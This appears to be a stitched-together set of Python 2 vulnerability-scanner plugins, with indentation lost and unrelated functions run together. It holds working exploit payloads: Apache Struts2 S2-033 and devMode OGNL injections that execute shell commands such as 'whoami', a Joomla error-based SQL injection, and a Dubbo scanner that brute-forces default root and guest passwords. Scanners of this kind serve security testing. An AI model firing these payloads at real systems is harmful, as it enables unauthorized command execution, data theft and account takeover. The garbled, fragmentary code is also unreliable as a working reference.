def strust2_033(self,url):
from urlparse import urljoin
result = {}
# S2-033 POC
# Author: CF_HB
# 时间:2016年6月6日
# 漏洞编号:CVE-2016-3087 (S2-033)
# 漏洞详情:http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/
s2033_poc = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=echo vulnerable"
try:
poc_url = urljoin(url,s2033_poc)
#print poc_url
s = req.session()
res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
print '033poc###################################'
print res.content
if res.status_code == 200 and "vulnerable" in res.content:
#print "{url} is vulnerable S2-033.".format(url=url)
exp = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami"
target = urljoin(url, exp)
res = req.post(target, timeout=3, allow_redirects=False, verify=False)
restext = res.text.encode('utf-8').strip().strip('\x00')
print '033exp###########################'
print restext
if 'command=whoami' not in restext:
result['VerifyInfo'] = {}
result['name'] = 'strust2_033'
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = poc_url
else:
#print "{url} is not vulnerable..".format(url=url)
pass
except Exception, e:
print e
def __init__(self, url, *args, **kwargs):
super(SockJS, self).__init__(*args, **kwargs)
self.base = '{}/{}/{}'.format(url, random.randint(0, 1000),
random_str(8))
self.daemon = True
self.session = req.session()
self.session.headers = {
'Referer':
url,
'User-Agent':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
}
self.t = int(time.time() * 1000)
def _verify(self):
result = {}
harbor_session = req.session()
username = self.get_pass(harbor_session)
url = urljoin(self.url, '/api/users')
header = {
"Content-Type": "application/json",
"Accept": "application/json"
}
content = harbor_session.get(url, headers=header).content
for item in json.loads(content):
if item['username'] == username and item['has_admin_role']:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
return self.parse_output(result)
return self.parse_output(result)
def _verify(self):
'''verify mode'''
result = {}
joomla_session = req.session()
self.get_pass(joomla_session)
rand_str = randomStr(10, "0123456789")
url = urljoin(self.url,
'/administrator/index.php?option=com_users&view=notes')
sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(
randstr=rand_str)
r = joomla_session.post(url=url,
headers=self.headers,
data=sqli_payload)
if r.status_code == 500 and hashlib.md5(
rand_str).hexdigest()[0:31] in r.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
return self.parse_output(result)
def strust2_devmode(self,url):
from urlparse import urljoin
result = {}
#devMode模式漏洞
data_dev = '?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=echo vulnerable'
try:
poc_url = urljoin(url,data_dev)
#print poc_url
s = req.session()
res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
if "vulnerable" in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = poc_url + "strust2_devmode"
else:
#print "{url} is not vulnerable..".format(url=url)
pass
except Exception, e:
#print "Failed to connection target, try again.."
print e
def _verify(self):
# 调用指纹方法
result = {}
output = Output(self)
import socket
import telnetlib
import base64
# 默认端口 web 8080 telnet 7070 但是很多dubbo自定义了端口,以下是其他比较常见的dubbo可能存在的端口
unauth_ports = { #用于探测 1、直接未授权访问 2、basic 弱口令登录
"80",
"443",
"8080", #default port test demo 1.1.1.1
# "8081",
# "8082",
# "8083",
# "8084",
# "8086",
"8088",
"8888",
# "8089",
# "8090",
"8000", # default pwd test :http://1.1.1.1:8000/
# "9080",
# "9090",
# "9999",
# "18080",
# "28080",
}
default_account = { #默认账号检测 default root/root(admin) guest /guest
"root",
#"admin",
"guest",
}
default_pwd = { #默认密码检测
"root",
#"admin",
"guest",
}
telnet_ports = {
"7070", #default port 1.1.1.1
# "1234",
# "8000",
"10001",
# "9999",
# "19999",
# "29999",
# "20000",
# "18080",
# "28080",
# "6060",
# "8084",
# "12345",
}
vul_port = []
#step 1 http 以及弱口令
for p in unauth_ports:
url = '%s:%s' % (self.url, p)
try:
resp = req.get(str(url), timeout=1)
#print resp.text
if "<title>dubbo</title>" in resp.text.lower():
vul_port.append(p)
elif resp.headers[
"www-authenticate"] == "Basic realm=\"dubbo\"":
#print "get basic"
#vul_port.append(p)
#构造弱口令爆破
for user in default_account:
for pwd in default_pwd:
verify_str = user + ":" + pwd
#print verify_str
verify_str = base64.b64encode(verify_str)
basic_auth = {
'Authorization': 'BASIC ' + verify_str
}
#print verify_str
httpreq = req.session()
raa = httpreq.get(url,
headers=basic_auth,
timeout=1)
#print raa.text
#print raa.status_code
if 200 == raa.status_code:
#print "get weak pwd"
py = p + ':(' + user + '|' + pwd + ')'
vul_port.append(py)
except Exception, e:
#print e
pass